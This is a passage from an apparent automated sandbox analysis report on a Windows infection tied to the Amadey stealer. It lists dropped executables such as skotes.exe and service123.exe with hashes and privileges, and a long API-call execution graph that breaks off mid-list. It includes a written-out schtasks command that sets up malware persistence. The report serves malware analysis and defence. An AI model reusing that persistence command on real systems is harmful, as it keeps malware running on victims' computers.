                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          Imagebase:0x610000
                                                                                                                                                                                                                                                          File size:3'008'512 bytes
                                                                                                                                                                                                                                                          MD5 hash:EB5E8AF364226452A7B60CFDF34CE69B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002B.00000003.3003854832.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002B.00000002.3046720991.0000000000611000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:44
                                                                                                                                                                                                                                                          Start time:08:22:40
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\service123.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\service123.exe"
                                                                                                                                                                                                                                                          Imagebase:0x650000
                                                                                                                                                                                                                                                          File size:314'617'856 bytes
                                                                                                                                                                                                                                                          MD5 hash:8F8B80038AAA07D28149480E2229DB51
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:45
                                                                                                                                                                                                                                                          Start time:08:22:40
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                                                                                                                                                                                                                                                          Imagebase:0xfe0000
                                                                                                                                                                                                                                                          File size:187'904 bytes
                                                                                                                                                                                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:46
                                                                                                                                                                                                                                                          Start time:08:22:40
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:48
                                                                                                                                                                                                                                                          Start time:08:22:40
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6440 -s 1884
                                                                                                                                                                                                                                                          Imagebase:0xd20000
                                                                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:50
                                                                                                                                                                                                                                                          Start time:08:22:44
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\service123.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\/service123.exe
                                                                                                                                                                                                                                                          Imagebase:
                                                                                                                                                                                                                                                          File size:314'617'856 bytes
                                                                                                                                                                                                                                                          MD5 hash:8F8B80038AAA07D28149480E2229DB51
                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:51
                                                                                                                                                                                                                                                          Start time:08:22:44
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1017630001\d0b5a60121.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1017630001\d0b5a60121.exe"
                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                          File size:4'438'776 bytes
                                                                                                                                                                                                                                                          MD5 hash:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:52
                                                                                                                                                                                                                                                          Start time:08:22:49
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                                                                                                                                          Imagebase:
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:53
                                                                                                                                                                                                                                                          Start time:08:22:49
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                            Execution Coverage:30.7%
                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                            Signature Coverage:27.7%
                                                                                                                                                                                                                                                            Total number of Nodes:923
                                                                                                                                                                                                                                                            Total number of Limit Nodes:24
                                                                                                                                                                                                                                                            execution_graph 2096 df4cd0 2097 df4d0b 2096->2097 2098 df4cf4 2096->2098 2099 df4d02 2097->2099 2101 df4dcb 2097->2101 2105 df4d25 2097->2105 2098->2099 2100 df4b60 CloseHandle 2098->2100 2153 df6ce0 2099->2153 2100->2099 2104 df4dd4 SetDlgItemTextA 2101->2104 2106 df4de3 2101->2106 2103 df4e95 2104->2106 2105->2099 2119 df4c37 2105->2119 2106->2099 2127 df476d 2106->2127 2110 df4e38 2110->2099 2136 df4980 2110->2136 2115 df4e64 2144 df47e0 LocalAlloc 2115->2144 2118 df4e6f 2118->2099 2120 df4c88 2119->2120 2121 df4c4c DosDateTimeToFileTime 2119->2121 2120->2099 2124 df4b60 2120->2124 2121->2120 2122 df4c5e LocalFileTimeToFileTime 2121->2122 2122->2120 2123 df4c70 SetFileTime 2122->2123 2123->2120 2125 df4b92 CloseHandle 2124->2125 2126 df4b76 SetFileAttributesA 2124->2126 2125->2126 2126->2099 2158 df66ae GetFileAttributesA 2127->2158 2129 df477b 2129->2110 2130 df47cc SetFileAttributesA 2131 df47db 2130->2131 2131->2110 2135 df47c2 2135->2130 2137 df4990 2136->2137 2138 df49a5 2137->2138 2139 df49c2 lstrcmpA 2137->2139 2140 df44b9 20 API calls 2138->2140 2141 df4a0e 2139->2141 2143 df49ba 2139->2143 2140->2143 2141->2143 2224 df487a 2141->2224 2143->2099 2143->2115 2145 df480f LocalAlloc 2144->2145 2146 df47f6 2144->2146 2149 df4831 2145->2149 2152 df480b 2145->2152 2147 df44b9 20 API calls 2146->2147 2147->2152 2150 df44b9 20 API calls 2149->2150 2151 df4846 LocalFree 2150->2151 2151->2152 2152->2118 2154 df6ceb 2153->2154 2155 df6ce8 2153->2155 2237 df6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2154->2237 2155->2103 2157 df6e26 2157->2103 2159 df4777 2158->2159 2159->2129 2159->2130 2160 df6517 FindResourceA 2159->2160 2161 df656b 2160->2161 2162 df6536 LoadResource 2160->2162 2167 df44b9 2161->2167 2162->2161 2164 df6544 DialogBoxIndirectParamA FreeResource 2162->2164 2164->2161 2166 df47b1 2164->2166 2166->2130 2166->2131 2166->2135 2168 df44fe LoadStringA 2167->2168 2182 df455a 2167->2182 2169 df4527 2168->2169 2170 df4562 2168->2170 2172 df681f 10 API calls 2169->2172 2175 df45c9 2170->2175 2179 df457e 2170->2179 2171 df6ce0 4 API calls 2174 df4689 2171->2174 2173 df452c 2172->2173 2180 df4536 MessageBoxA 2173->2180 2208 df67c9 2173->2208 2174->2166 2177 df4607 LocalAlloc 2175->2177 2181 df45cd 2175->2181 2177->2182 2191 df45c4 2177->2191 2179->2179 2186 df4596 LocalAlloc 2179->2186 2180->2182 2181->2181 2183 df45d9 LocalAlloc 2181->2183 2182->2171 2183->2182 2184 df45f3 2183->2184 2187 df171e _vsnprintf 2184->2187 2185 df462d MessageBeep 2196 df681f 2185->2196 2186->2182 2189 df45af 2186->2189 2187->2191 2214 df171e 2189->2214 2191->2185 2193 df4645 MessageBoxA LocalFree 2193->2182 2194 df67c9 EnumResourceLanguagesA 2194->2193 2197 df6857 GetVersionExA 2196->2197 2198 df6940 2196->2198 2200 df687c 2197->2200 2207 df691a 2197->2207 2199 df6ce0 4 API calls 2198->2199 2201 df463b 2199->2201 2202 df68a5 GetSystemMetrics 2200->2202 2200->2207 2201->2193 2201->2194 2203 df68b5 RegOpenKeyExA 2202->2203 2202->2207 2204 df68d6 RegQueryValueExA RegCloseKey 2203->2204 2203->2207 2205 df690c 2204->2205 2204->2207 2218 df66f9 2205->2218 2207->2198 2209 df67e2 2208->2209 2212 df6803 2208->2212 2222 df6793 EnumResourceLanguagesA 2209->2222 2211 df67f5 2211->2212 2223 df6793 EnumResourceLanguagesA 2211->2223 2212->2180 2215 df172d 2214->2215 2216 df173d _vsnprintf 2215->2216 2217 df175d 2215->2217 2216->2217 2217->2191 2219 df670f 2218->2219 2220 df6740 CharNextA 2219->2220 2221 df674b 2219->2221 2220->2219 2221->2207 2222->2211 2223->2212 2225 df48a2 CreateFileA 2224->2225 2227 df48e9 2225->2227 2228 df4908 2225->2228 2227->2228 2229 df48ee 2227->2229 2228->2143 2232 df490c 2229->2232 2233 df48f5 CreateFileA 2232->2233 2234 df4917 2232->2234 2233->2228 2234->2233 2235 df4962 CharNextA 2234->2235 2236 df4953 CreateDirectoryA 2234->2236 2235->2234 2236->2235 2237->2157 2238 df4ad0 2246 df3680 2238->2246 2241 df4aee WriteFile 2243 df4b0f 2241->2243 2244 df4b14 2241->2244 2242 df4ae9 2244->2243 2245 df4b3b SendDlgItemMessageA 2244->2245 2245->2243 2247 df3691 MsgWaitForMultipleObjects 2246->2247 2248 df36a9 PeekMessageA 2247->2248 2249 df36e8 2247->2249 2248->2247 2250 df36bc 2248->2250 2249->2241 2249->2242 2250->2247 2250->2249 2251 df36c7 DispatchMessageA 2250->2251 2252 df36d1 PeekMessageA 2250->2252 2251->2252 2252->2250 3017 df34f0 3018 df3504 3017->3018 3038 df35b8 3017->3038 3019 df35be GetDesktopWindow 3018->3019 3020 df351b 3018->3020 3018->3038 3039 df43d0 6 API calls 3019->3039 3022 df354f 3020->3022 3023 df351f 3020->3023 3021 df3526 3022->3021 3028 df3559 ResetEvent 3022->3028 3023->3021 3027 df352d TerminateThread EndDialog 3023->3027 3024 df3671 EndDialog 3024->3021 3027->3021 3031 df44b9 20 API calls 3028->3031 3029 df361d SetWindowTextA CreateThread 3029->3021 3032 df3646 3029->3032 3030 df35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3030->3029 3033 df3581 3031->3033 3034 df44b9 20 API calls 3032->3034 3035 df359b SetEvent 3033->3035 3036 df358a SetEvent 3033->3036 3034->3038 3037 df3680 4 API calls 3035->3037 3036->3021 3037->3038 3038->3021 3038->3024 3041 df4463 SetWindowPos 3039->3041 3042 df6ce0 4 API calls 3041->3042 3043 df35d6 3042->3043 3043->3029 3043->3030 3044 df4a50 3045 df4a9f ReadFile 3044->3045 3046 df4a66 3044->3046 3047 df4abb 3045->3047 3046->3047 3048 df4a82 memcpy 3046->3048 3048->3047 3049 df3450 3050 df345e 3049->3050 3051 df34d3 EndDialog 3049->3051 3052 df349a GetDesktopWindow 3050->3052 3056 df3465 3050->3056 3053 df346a 3051->3053 3054 df43d0 11 API calls 3052->3054 3055 df34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3054->3055 3055->3053 3056->3053 3057 df348c EndDialog 3056->3057 3057->3053 3058 df7270 _except_handler4_common 3059 df3210 3060 df3227 3059->3060 3083 df328e EndDialog 3059->3083 3061 df33e2 GetDesktopWindow 3060->3061 3063 df3235 3060->3063 3064 df43d0 11 API calls 3061->3064 3065 df32dd GetDlgItemTextA 3063->3065 3066 df324c 3063->3066 3091 df3239 3063->3091 3067 df33f1 SetWindowTextA SendDlgItemMessageA 3064->3067 3069 df3366 3065->3069 3076 df32fc 3065->3076 3070 df32c5 EndDialog 3066->3070 3071 df3251 3066->3071 3068 df341f GetDlgItem EnableWindow 3067->3068 3067->3091 3068->3091 3075 df44b9 20 API calls 3069->3075 3070->3091 3072 df325c LoadStringA 3071->3072 3071->3091 3073 df327b 3072->3073 3074 df3294 3072->3074 3079 df44b9 20 API calls 3073->3079 3097 df4224 LoadLibraryA 3074->3097 3075->3091 3076->3069 3078 df3331 GetFileAttributesA 3076->3078 3081 df333f 3078->3081 3082 df337c 3078->3082 3079->3083 3086 df44b9 20 API calls 3081->3086 3085 df658a CharPrevA 3082->3085 3083->3091 3084 df32a5 SetDlgItemTextA 3084->3073 3084->3091 3087 df338d 3085->3087 3088 df3351 3086->3088 3089 df58c8 27 API calls 3087->3089 3090 df335a CreateDirectoryA 3088->3090 3088->3091 3092 df3394 3089->3092 3090->3069 3090->3082 3092->3069 3093 df33a4 3092->3093 3094 df33c7 EndDialog 3093->3094 3095 df597d 34 API calls 3093->3095 3094->3091 3096 df33c3 3095->3096 3096->3091 3096->3094 3098 df4246 GetProcAddress 3097->3098 3099 df43b2 3097->3099 3100 df425d GetProcAddress 3098->3100 3101 df43a4 FreeLibrary 3098->3101 3103 df44b9 20 API calls 3099->3103 3100->3101 3102 df4274 GetProcAddress 3100->3102 3101->3099 3102->3101 3104 df428b 3102->3104 3105 df329d 3103->3105 3106 df42e1 3104->3106 3107 df4295 GetTempPathA 3104->3107 3105->3084 3105->3091 3111 df4390 FreeLibrary 3106->3111 3108 df42ad 3107->3108 3108->3108 3109 df42b4 CharPrevA 3108->3109 3109->3106 3110 df42d0 CharPrevA 3109->3110 3110->3106 3111->3105 2253 df4cc0 GlobalFree 2254 df6a60 2271 df7155 2254->2271 2256 df6a65 2257 df6a76 GetStartupInfoW 2256->2257 2258 df6a93 2257->2258 2259 df6aa8 2258->2259 2260 df6aaf Sleep 2258->2260 2261 df6ac7 _amsg_exit 2259->2261 2262 df6ad1 2259->2262 2260->2258 2261->2262 2263 df6b13 _initterm 2262->2263 2264 df6af4 2262->2264 2267 df6b2e __IsNonwritableInCurrentImage 2262->2267 2263->2267 2265 df6bd6 _ismbblead 2265->2267 2267->2265 2268 df6c1e 2267->2268 2269 df6bbe exit 2267->2269 2276 df2bfb GetVersion 2267->2276 2268->2264 2270 df6c27 _cexit 2268->2270 2269->2267 2270->2264 2272 df717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2271->2272 2273 df717a 2271->2273 2275 df71cd 2272->2275 2273->2272 2274 df71e2 2273->2274 2274->2256 2275->2274 2277 df2c0f 2276->2277 2278 df2c50 2276->2278 2277->2278 2280 df2c13 GetModuleHandleW 2277->2280 2293 df2caa memset memset memset 2278->2293 2280->2278 2281 df2c22 GetProcAddress 2280->2281 2281->2278 2290 df2c34 2281->2290 2282 df2c8e 2284 df2c9e 2282->2284 2285 df2c97 CloseHandle 2282->2285 2284->2267 2285->2284 2290->2278 2291 df2c89 2385 df1f90 2291->2385 2402 df468f FindResourceA SizeofResource 2293->2402 2296 df2d2d CreateEventA SetEvent 2297 df468f 7 API calls 2296->2297 2299 df2d57 2297->2299 2298 df44b9 20 API calls 2324 df2d6e 2298->2324 2300 df2d5b 2299->2300 2302 df2e1f 2299->2302 2304 df468f 7 API calls 2299->2304 2301 df44b9 20 API calls 2300->2301 2301->2324 2407 df5c9e 2302->2407 2303 df6ce0 4 API calls 2305 df2c62 2303->2305 2307 df2d9f 2304->2307 2305->2282 2334 df2f1d 2305->2334 2307->2300 2309 df2da3 CreateMutexA 2307->2309 2309->2302 2314 df2dbd GetLastError 2309->2314 2310 df2e3a 2312 df2e43 2310->2312 2313 df2e52 FindResourceA 2310->2313 2311 df2e30 2311->2298 2434 df2390 2312->2434 2317 df2e6e 2313->2317 2318 df2e64 LoadResource 2313->2318 2314->2302 2316 df2dca 2314->2316 2319 df2dea 2316->2319 2320 df2dd5 2316->2320 2323 df2e8b 2317->2323 2317->2324 2318->2317 2322 df44b9 20 API calls 2319->2322 2321 df44b9 20 API calls 2320->2321 2325 df2de8 2321->2325 2326 df2dff 2322->2326 2449 df36ee GetVersionExA 2323->2449 2324->2303 2328 df2e04 CloseHandle 2325->2328 2326->2302 2326->2328 2328->2324 2329 df2ee8 2329->2324 2333 df6517 24 API calls 2333->2329 2335 df2f3f 2334->2335 2336 df2f64 2334->2336 2337 df2f4d 2335->2337 2538 df51e5 2335->2538 2342 df303c 2336->2342 2576 df5164 2336->2576 2337->2336 2337->2342 2557 df3a3f 2337->2557 2341 df2f71 2341->2342 2589 df55a0 2341->2589 2345 df6ce0 4 API calls 2342->2345 2347 df2c6b 2345->2347 2346 df2f86 GetSystemDirectoryA 2348 df658a CharPrevA 2346->2348 2372 df52b6 2347->2372 2349 df2fab LoadLibraryA 2348->2349 2350 df2ff7 FreeLibrary 2349->2350 2351 df2fc0 GetProcAddress 2349->2351 2353 df3017 SetCurrentDirectoryA 2350->2353 2354 df3006 2350->2354 2351->2350 2352 df2fd6 DecryptFileA 2351->2352 2352->2350 2362 df2ff0 2352->2362 2355 df3026 2353->2355 2356 df3054 2353->2356 2354->2353 2637 df621e GetWindowsDirectoryA 2354->2637 2357 df44b9 20 API calls 2355->2357 2359 df3061 2356->2359 2647 df3b26 2356->2647 2361 df3037 2357->2361 2359->2342 2367 df307a 2359->2367 2656 df256d 2359->2656 2704 df6285 GetLastError 2361->2704 2362->2350 2368 df3098 2367->2368 2667 df3ba2 2367->2667 2368->2342 2370 df30af 2368->2370 2706 df4169 2370->2706 2375 df52d6 2372->2375 2382 df5316 2372->2382 2373 df538c 2378 df6ce0 4 API calls 2373->2378 2374 df5374 2374->2373 3012 df1fe1 2374->3012 2376 df5300 LocalFree LocalFree 2375->2376 2377 df52eb SetFileAttributesA DeleteFileA 2375->2377 2376->2375 2376->2382 2377->2376 2379 df2c72 2378->2379 2379->2282 2379->2291 2381 df535e SetCurrentDirectoryA 2384 df2390 13 API calls 2381->2384 2382->2374 2382->2381 2383 df65e8 4 API calls 2382->2383 2383->2381 2384->2374 2386 df1f9a 2385->2386 2387 df1f9f 2385->2387 2388 df1ea7 15 API calls 2386->2388 2389 df1fc0 2387->2389 2390 df44b9 20 API calls 2387->2390 2393 df1fd9 2387->2393 2388->2387 2391 df1fcf ExitWindowsEx 2389->2391 2392 df1ee2 GetCurrentProcess OpenProcessToken 2389->2392 2389->2393 2390->2389 2391->2393 2395 df1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2392->2395 2397 df1f0e 2392->2397 2393->2282 2396 df1f6b ExitWindowsEx 2395->2396 2395->2397 2396->2397 2398 df1f1f 2396->2398 2399 df44b9 20 API calls 2397->2399 2400 df6ce0 4 API calls 2398->2400 2399->2398 2401 df1f8c 2400->2401 2401->2282 2403 df2d1a 2402->2403 2404 df46b6 2402->2404 2403->2296 2403->2311 2404->2403 2405 df46be FindResourceA LoadResource LockResource 2404->2405 2405->2403 2406 df46df memcpy_s FreeResource 2405->2406 2406->2403 2408 df60fb 2407->2408 2432 df5cc3 2407->2432 2410 df6ce0 4 API calls 2408->2410 2409 df5dd0 2409->2408 2413 df5dec GetModuleFileNameA 2409->2413 2412 df2e2c 2410->2412 2411 df5ced CharNextA 2411->2432 2412->2310 2412->2311 2414 df5e17 2413->2414 2415 df5e0a 2413->2415 2414->2408 2484 df66c8 2415->2484 2417 df6218 2493 df6e2a 2417->2493 2420 df5e36 CharUpperA 2421 df61d0 2420->2421 2420->2432 2422 df44b9 20 API calls 2421->2422 2423 df61e7 2422->2423 2424 df61f7 ExitProcess 2423->2424 2425 df61f0 CloseHandle 2423->2425 2425->2424 2426 df5f9f CharUpperA 2426->2432 2427 df5f59 CompareStringA 2427->2432 2428 df6003 CharUpperA 2428->2432 2429 df667f IsDBCSLeadByte CharNextA 2429->2432 2430 df5edc CharUpperA 2430->2432 2431 df60a2 CharUpperA 2431->2432 2432->2408 2432->2409 2432->2411 2432->2417 2432->2420 2432->2426 2432->2427 2432->2428 2432->2429 2432->2430 2432->2431 2489 df658a 2432->2489 2435 df24cb 2434->2435 2438 df23b9 2434->2438 2436 df6ce0 4 API calls 2435->2436 2437 df24dc 2436->2437 2437->2324 2438->2435 2439 df23e9 FindFirstFileA 2438->2439 2439->2435 2447 df2407 2439->2447 2440 df2479 2444 df2488 SetFileAttributesA DeleteFileA 2440->2444 2441 df2421 lstrcmpA 2442 df24a9 FindNextFileA 2441->2442 2443 df2431 lstrcmpA 2441->2443 2445 df24bd FindClose RemoveDirectoryA 2442->2445 2442->2447 2443->2442 2443->2447 2444->2442 2445->2435 2446 df658a CharPrevA 2446->2447 2447->2440 2447->2441 2447->2442 2447->2446 2448 df2390 5 API calls 2447->2448 2448->2447 2450 df372d 2449->2450 2454 df3737 2449->2454 2451 df44b9 20 API calls 2450->2451 2463 df39fc 2450->2463 2451->2463 2452 df6ce0 4 API calls 2453 df2e92 2452->2453 2453->2324 2453->2329 2464 df18a3 2453->2464 2454->2450 2456 df38a4 2454->2456 2454->2463 2500 df28e8 2454->2500 2456->2450 2457 df39c1 MessageBeep 2456->2457 2456->2463 2458 df681f 10 API calls 2457->2458 2459 df39ce 2458->2459 2460 df39d8 MessageBoxA 2459->2460 2461 df67c9 EnumResourceLanguagesA 2459->2461 2460->2463 2461->2460 2463->2452 2465 df18d5 2464->2465 2471 df19b8 2464->2471 2529 df17ee LoadLibraryA 2465->2529 2467 df6ce0 4 API calls 2469 df19d5 2467->2469 2469->2329 2469->2333 2470 df18e5 GetCurrentProcess OpenProcessToken 2470->2471 2472 df1900 GetTokenInformation 2470->2472 2471->2467 2473 df19aa CloseHandle 2472->2473 2474 df1918 GetLastError 2472->2474 2473->2471 2474->2473 2475 df1927 LocalAlloc 2474->2475 2476 df19a9 2475->2476 2477 df1938 GetTokenInformation 2475->2477 2476->2473 2478 df194e AllocateAndInitializeSid 2477->2478 2479 df19a2 LocalFree 2477->2479 2478->2479 2482 df196e 2478->2482 2479->2476 2480 df1999 FreeSid 2480->2479 2481 df1975 EqualSid 2481->2482 2483 df198c 2481->2483 2482->2480 2482->2481 2482->2483 2483->2480 2487 df66d5 2484->2487 2485 df66f3 2485->2414 2487->2485 2488 df66e5 CharNextA 2487->2488 2496 df6648 2487->2496 2488->2487 2490 df659b 2489->2490 2490->2490 2491 df65ab 2490->2491 2492 df65b8 CharPrevA 2490->2492 2491->2432 2492->2491 2499 df6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2493->2499 2495 df621d 2497 df665d IsDBCSLeadByte 2496->2497 2498 df6668 2496->2498 2497->2498 2498->2487 2499->2495 2501 df2a62 2500->2501 2508 df290d 2500->2508 2503 df2a6e GlobalFree 2501->2503 2504 df2a75 2501->2504 2503->2504 2504->2456 2505 df2955 GlobalAlloc 2505->2501 2506 df2968 GlobalLock 2505->2506 2506->2501 2506->2508 2507 df2a20 GlobalUnlock 2507->2508 2508->2501 2508->2505 2508->2507 2509 df2a80 GlobalUnlock 2508->2509 2510 df2773 2508->2510 2509->2501 2511 df27a3 CharUpperA CharNextA CharNextA 2510->2511 2512 df28b2 2510->2512 2513 df27db 2511->2513 2514 df28b7 GetSystemDirectoryA 2511->2514 2512->2514 2515 df28a8 GetWindowsDirectoryA 2513->2515 2516 df27e3 2513->2516 2517 df28bf 2514->2517 2515->2517 2522 df658a CharPrevA 2516->2522 2518 df28d2 2517->2518 2519 df658a CharPrevA 2517->2519 2520 df6ce0 4 API calls 2518->2520 2519->2518 2521 df28e2 2520->2521 2521->2508 2523 df2810 RegOpenKeyExA 2522->2523 2523->2517 2524 df2837 RegQueryValueExA 2523->2524 2525 df285c 2524->2525 2526 df289a RegCloseKey 2524->2526 2527 df2867 ExpandEnvironmentStringsA 2525->2527 2528 df287a 2525->2528 2526->2517 2527->2528 2528->2526 2530 df1826 GetProcAddress 2529->2530 2531 df1890 2529->2531 2533 df1889 FreeLibrary 2530->2533 2534 df1839 AllocateAndInitializeSid 2530->2534 2532 df6ce0 4 API calls 2531->2532 2535 df189f 2532->2535 2533->2531 2534->2533 2536 df185f FreeSid 2534->2536 2535->2470 2535->2471 2536->2533 2539 df468f 7 API calls 2538->2539 2540 df51f9 LocalAlloc 2539->2540 2541 df522d 2540->2541 2542 df520d 2540->2542 2544 df468f 7 API calls 2541->2544 2543 df44b9 20 API calls 2542->2543 2545 df521e 2543->2545 2546 df523a 2544->2546 2547 df6285 GetLastError 2545->2547 2548 df523e 2546->2548 2549 df5262 lstrcmpA 2546->2549 2554 df5223 2547->2554 2550 df44b9 20 API calls 2548->2550 2551 df527e 2549->2551 2552 df5272 LocalFree 2549->2552 2553 df524f LocalFree 2550->2553 2555 df44b9 20 API calls 2551->2555 2552->2554 2553->2554 2554->2337 2556 df5290 LocalFree 2555->2556 2556->2554 2558 df468f 7 API calls 2557->2558 2559 df3a55 LocalAlloc 2558->2559 2560 df3a8e 2559->2560 2561 df3a6c 2559->2561 2562 df468f 7 API calls 2560->2562 2563 df44b9 20 API calls 2561->2563 2565 df3a98 2562->2565 2564 df3a7d 2563->2564 2566 df6285 GetLastError 2564->2566 2567 df3a9c 2565->2567 2568 df3ac5 lstrcmpA 2565->2568 2572 df3a82 2566->2572 2569 df44b9 20 API calls 2567->2569 2570 df3b0d LocalFree 2568->2570 2571 df3ada 2568->2571 2573 df3aad LocalFree 2569->2573 2570->2572 2574 df6517 24 API calls 2571->2574 2572->2336 2573->2572 2575 df3aec LocalFree 2574->2575 2575->2572 2577 df468f 7 API calls 2576->2577 2578 df5175 2577->2578 2579 df517a 2578->2579 2580 df51af 2578->2580 2582 df44b9 20 API calls 2579->2582 2581 df468f 7 API calls 2580->2581 2584 df51c0 2581->2584 2583 df518d 2582->2583 2583->2341 2719 df6298 2584->2719 2587 df51e1 2587->2341 2588 df44b9 20 API calls 2588->2583 2590 df468f 7 API calls 2589->2590 2591 df55c7 LocalAlloc 2590->2591 2592 df55fd 2591->2592 2593 df55db 2591->2593 2595 df468f 7 API calls 2592->2595 2594 df44b9 20 API calls 2593->2594 2596 df55ec 2594->2596 2597 df560a 2595->2597 2598 df6285 GetLastError 2596->2598 2599 df560e 2597->2599 2600 df5632 lstrcmpA 2597->2600 2625 df55f1 2598->2625 2601 df44b9 20 API calls 2599->2601 2602 